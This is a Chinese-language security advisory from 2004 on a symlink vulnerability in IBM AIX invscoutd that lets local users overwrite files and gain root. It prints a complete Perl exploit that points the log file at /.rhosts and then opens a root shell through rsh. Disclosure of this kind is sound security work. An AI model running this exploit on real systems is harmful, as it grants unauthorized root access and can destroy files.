AIX Invscoutd符号连接漏洞
发布日期:2004-03-26
更新日期:2004-03-31
受影响系统:IBM AIX 5.1L
IBM AIX 5.1
IBM AIX 4.3.3
描述:
BUGTRAQ ID:
9982
IBM AIX是一款商业性质UNIX操作系统。
AIX invscoutd不安全建立临时文件,本地攻击者可以利用这个漏洞提升权限。
AIX invscoutd由于设计错误,允许用户指定一个日志文件来写入数据,恶意用户可以建议一个指向本地系统文件的符号连接,当运行invscoutd写入日志信息时,可破坏指向的本地文件,造成本地拒绝服务,或权限提升。
<*来源:watercloud (
watercloud@xfocus.org)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
watercloud (
watercloud@xfocus.org)提供了如下测试方法:
#!/usr/bin/perl
# FileName: x_invscoutd.pl
# Exploit invscoutd of Aix4.x & 5L to get a uid=0 shell.
# Tested : on Aix4.3.3 & Aix5.1.
# Some high version of invscoutd is not affected.
# Author :
watercloud@xfocus.org
# Site : www.xfocus.org www.xfocus.net
# Date : 2003-5-29
# Announce: use as your owner risk!
$LOG="/tmp/.ex/.hello\n+ +\nworld";
$CMD="/usr/sbin/invscoutd";
umask 022;
mkdir "/tmp/.ex",0777;
print "Exploit error on kill process invscoutd !!" ,exit 1
if &killproc() == 0;
symlink "/.rhosts",$LOG;
system $CMD,"-p7321",$LOG; &killproc();
unlink $LOG;
print "\n============\nRemember to remove /.rhosts !!\n";
print "rsh localhost -l root '/bin/sh -i'\n";
print "waiting . . . . . .\n";
system "rsh","localhost","-l","root","/bin/sh -i";
system $CMD,"-p808","/dev/null" ; &killproc();
rmdir "/tmp/.ex";
sub killproc() {
$_=`ps -ef |grep invscoutd |grep -v grep |grep -v perl`;
@proc_lst=split;
$ret=kill 9,$proc_lst[1] if $proc_lst[1];
$ret=-1 if ! defined $ret;
return $ret;
}
#EOF
建议:
厂商补丁:
IBM
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.ers.ibm.com/浏览次数:3226
严重程度:0(网友投票)